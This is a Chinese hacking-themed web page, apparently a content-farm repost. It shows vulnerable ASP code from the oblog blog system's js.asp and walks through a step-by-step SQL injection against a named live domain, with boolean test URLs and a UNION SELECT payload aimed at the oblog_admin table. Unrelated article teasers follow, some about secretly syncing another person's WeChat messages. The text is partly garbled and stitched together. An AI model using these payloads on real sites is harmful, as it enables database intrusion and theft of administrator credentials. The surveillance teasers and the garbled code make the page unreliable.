找黑客找回邮箱密码-你以为的黑客和现实的黑客(你眼中的黑客和现实中
漏洞文件:js.asp
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request(”tid”)
postnum=n
l=CInt(Request(”l”))
u=CInt(Request(”u”))
t=CInt(Request(”t”))
Dim rs,sql,sRet,sAddon
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
If teamid<>“” And teamid<>“0″ Then
teamid=Replace(teamid,”|”,”,”)
Sql=Sql & ” And teamid In (” & teamid & “) ”
End If
Sql=Sql & ” order by postid Desc”
Set rs=oblog.Execute(Sql)
sRet=”
”
Do While Not rs.Eof
sAddon=”"
* sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “”
If u=1 Then sAddon=rs(4)
if t=1 Then
If sAddon<>“” Then sAddon=sAddon & “,”
sAddon=sAddon & rs(3)
End If
If sAddon<>“” Then sAddon=”(” & sAddon & “)”
sRet=sRet & sAddon & “
”
rs.Movenext
Loop
Set rs = Nothing
sRet=sRet & “
”
Response.write oblog.htm2js (sRet,True)
End Sub
调用show_posts()过程必须要符合上面的参数n=1,j=13
(” & teamid & “)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write('
相关文章
想成为黑客需要学什么(我想成为黑客)
@刘硕老师我现在在做一些简单的项目,一般用的就是python,本来以前c++用的比较多,现在用过python之后觉得python真的很简单,很简单而且不容易出错,我现在就是做的主要是类似爬虫的探测...
中国铁路连续5天每日发王洪文近况送旅客超千万 短途旅游客
中新社北京10月5日电 (记者 阮煜琳)据中国国家铁路集团有限公司消息,国庆小长假过半,全国铁路短途旅游、探亲等客流持续高位运行,全国铁路连续5天每日发送旅客超千万。 资料图:旅客步入候车大...
怎么样才可以和老板手机短信
. 最近很多的家长似乎在照顾孩子的孩子的时候被威胁了一样,什么东西这么强大可以威胁到家长呢?但是民间的治疗的方法很多,很多的人就是用偏方降住了威胁家长的物种哦。下面友谊长存的小编为大家分享这个强大的...
同步接收微信聊天记录(怎么样同步接收别人微信信息)
同歩接受微信聊天纪录(如何同歩接受他人微信信息) 现阶段手机微信端只有登录一个,同一个微信帐号是不可以两个手机登录的,可是能够好PC端另外登录,信息也是都能接到的 手机微信能够同歩接受此外一台手机...
两个微信同步信息(两部手机同步一个微信)
两个微信同步信息(两部手机同步一个微信)如果有人经常给你发送语音,肯定会有深切的感受。首先并不是所有环境都适合收听语音,再者收听这些语音往往要消耗很长时间,中间还不能打断。 近日腾讯推出了微信7.0...
恶搞黑客入侵壁纸(黑客壁纸图片)
本文导读目录: 1、黑客怎么能没有黑客壁纸 2、黑客动画吧 壁纸 3、谁给我点黑客的桌面和头像啊~~~```` 4、特殊桌面咋弄的啊 5、安卓手机被莫名其妙换了桌面壁纸,是被黑客入侵了...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!